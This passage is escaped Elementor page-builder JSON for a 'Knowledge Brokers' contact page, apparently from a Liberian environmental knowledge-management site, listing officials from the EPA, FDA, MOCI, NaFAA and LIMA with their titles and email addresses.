id=\\\"2889\\\"]\",\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e119157\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"3bb9b2b\"}]},\"elements\":[{\"id\":\"5726a77\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"98c4065\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":51,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"c0885e6\",\"elType\":\"widget\",\"settings\":{\"title\":\"EKMS Knowledge Brokers\",\"align\":\"center\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"500\",\"header_size\":\"h1\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"907c188\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Contact  our knowledge brokers for direct support or response to your questions:\",\"align\":\"center\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"206586f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"7f54ab8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f399fed\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_DC.jpg\",\"id\":2313},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/j-s-datuama-cammue\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"45dc831\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"97ee966\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_BK.jpg\",\"id\":2359},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/benjamin-karmorh\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\",\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"4d5438e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"18b04be\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/IMG_20200908_105852_513.jpg\",\"id\":3167},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/berexford-s-jallah\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7695f0f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"c329034\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"93bee82\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>J.S. Datuama Cammue<\\/strong><br \\/>MEAs Officer\\/UNCBD Focal Point<br \\/>jcammue@epa.gov.lr<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"05d0b76\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"821b474\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Benjamin Karmorh<\\/strong><br \\/>MEAs Coordinator\\/UNFCCC Focal Point<br \\/>bkarmorh@epa.gov.lr<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2f49cdd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"77354cc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Berexford S. Jallah<\\/strong><br \\/>GIS Coordinator\\/UNCCD Focal Point<br \\/>bjallah@epa.gov.lr<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73bdb81\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"6710f3e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f9614d7\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/so.jpg\",\"id\":3324}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"84a6f95\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d88ffbf\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_JJ.jpg\",\"id\":2365},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/john-k-jallah\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"391549e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4c9c6f3\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"\",\"id\":\"\"},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/kawusu-toure\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\",\"caption_typography_typography\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4093e35\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"b1acda1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4adfd45\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Jeremiah Sokan Sr<\\/strong><br \\/>Coordinator Climate Change Secretariat, EPA<br \\/><a href=\\\"mailto:jsokan@epa.gov.lr\\\">jsokan@epa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"9450b67\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0daecd0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>John K. Jallah<\\/strong><br \\/>Manager - Compliance and Enforcement, EPA<br \\/>jjallah@epa.gov.lr<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1bb41c7\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e4f745b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Kawusu Toure<\\/strong><br \\/>Assistant Manager - Compliance and Enforcement, ESIA, EPA<br \\/>kawumtoure@gmail.com<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"96e03da\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"9b01403\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4031f43\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/kn.png\",\"id\":3330}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"39e22a6\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"7b606ac\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/edward.png\",\"id\":3334}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"29ef7d1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"ddce9f1\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"f5bca22\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a080131\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Konikay Nimely<\\/strong><br \\/>EIA Manager, FDA<br \\/><a href=\\\"mailto:kondema79@gmail.com\\\">kondema79@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"79bfd85\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6a85176\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Edward S. Kamara<\\/strong><br>\\n\\nMarketing and Forest Forecast<br>\\n\\n<a href=\\\"mailto:kamara.ed14@gmail.com\\\">kamara.ed14@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b372794\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"89187ea\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Blamah Goll<\\/strong><br>\\nConservation Manager, FDA<br>\\n<a href=\\\"mailto:blamag@gmail.com\\\">blamag@gmail.com<\\/a><br>\\n<a href=\\\"mailto:blamahg@yahoo.com\\\">blamahg@yahoo.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d3e03bf\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"4d885f8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"32bbf7d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/francis-2.png\",\"id\":3340}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"0137c53\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"058ac29\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"4c547ba\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"2b0ae9e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"62420a0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Francis W. Mwah<\\/strong><\\/p><p>Director, MOA<\\/p><p><a href=\\\"mailto:fwmwah1958@yahoo.com\\\">fwmwah1958@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"33fc46f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9feecd9\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>John Willabo Johnson <\\/strong><br>\\n\\nAssistant Minister, MME<br>\\n\\n<a href=\\\"mailto:john.willabo@yahoo.com\\\">john.willabo@yahoo.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"34117d3\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"fe7894a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Urias Garsinii <\\/strong><br>\\nLand Use Management Manager, LLA<br>\\n<a href=\\\"mailto:ugarsinii@yahoo.com\\\">ugarsinii@yahoo.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"25d00af\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"fc5ff06\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9564f30\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/aw2.jpg\",\"id\":3171},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"20138ff\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"cd79b29\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/WIN_20160609_11_17_46_Pro.jpg\",\"id\":3160},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"d1e4641\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b7fd678\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/AlFreeman.jpg\",\"id\":3183},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"519145f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"8314024\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9c38029\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Aaron S.M. Wesseh<\\/strong><br>\\n\\nManager, CCCD Project<br>\\n\\n<a href=\\\"mailto:bethelapril90@gmail.com\\\">bethelapril90@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0cfcbe5\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"865743e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Jesse Mathies<\\/strong><br \\/>Assistant Director, MOCI<br \\/>Division of Foreign Trade<br \\/><a href=\\\"mailto:jesmathies@gmail.com\\\">jesmathies@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"98255ed\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0322201\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Alphonso Freeman<\\/strong><br \\/>Biosafety Officer, MOCI<br \\/>National Standard Laboratory<br \\/><a href=\\\"mailto:freemanalphonso29@yahoo.com\\\">freemanalphonso29@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2ea0ab9\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c682593\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"dc24385\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"5ae9515\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/1.jpg\",\"id\":3165},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"dbcd9dd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"992774f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"77967dc\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"ae8e0aa\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"2763f7b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"435cd31\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Lasana M. Donzo<\\/strong><br \\/>Coordinator for Standards, MOCI<br \\/>Bureau of Industrial Services<br \\/><a href=\\\"mailto:lasanadonzo@yahoo.com\\\">lasanadonzo@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0a4b126\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f7ea9a8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Mambu Golafale<\\/strong><br \\/>Senior Research Officer, MOCI<br \\/>Division of Knowledge Management &amp; Archive<br \\/><a href=\\\"mailto:mgolafale1@gmail.com\\\">mgolafale1@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b3d1f48\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a9ecf24\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Ahmed Sheriff <\\/strong><br \\/>Director, NaFAA<br \\/>Department of Marine Fisheries and Environment<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"738e0dd\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"6e7b3da\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"e8bed5f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"918d54e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"94412fe\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"74f915b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"e88acc7\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"d32c806\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f40392e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Anthony Yokie<\\/strong><br \\/>Manager, NaFAA<br \\/>Department of Marine Fisheries and Environment<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"23fe33d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ea61b10\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Tonia Boah <\\/strong><br \\/>NaFAA<br \\/>Monitoring, Control, and Surveillance Field Officer <\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"27d77d9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d2a5e3d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Joyce Kumeh<\\/strong><br \\/>NaFAA<br \\/>Small Scale Fisheries Officer<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1f03dc8\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"33e80f1\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"5c25b8f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"b4a2e51\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"e3dd1e8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"ad72733\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"707d444\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"23520fd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a3814ef\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Atty. Stephen B. Lavalah <\\/strong><br \\/>Associate Director, LIMA<br \\/>Department of Marine Environmental Protection<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"18738fa\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6765846\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Nadine Ajamia<\\/strong><br \\/>Policy Officer, LIMA<br \\/>Department of Marine Environmental Protection<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"bd520e9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"7bc5a8c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Henry Y. Kesselly<\\/strong><br \\/>Senior Research Officer, LIMA<br \\/>Department of Marine Environmental Protection<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e860d0b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"f6d0ce0\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"6b97206\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"76384d9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"c4dcbf8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"9d55206\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"8c09b65\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"a0b7d70\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"87f3106\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Konah Kaliku<\\/strong><br \\/>Environmental Inspector, LIMA<br \\/>Department of Marine Environmental 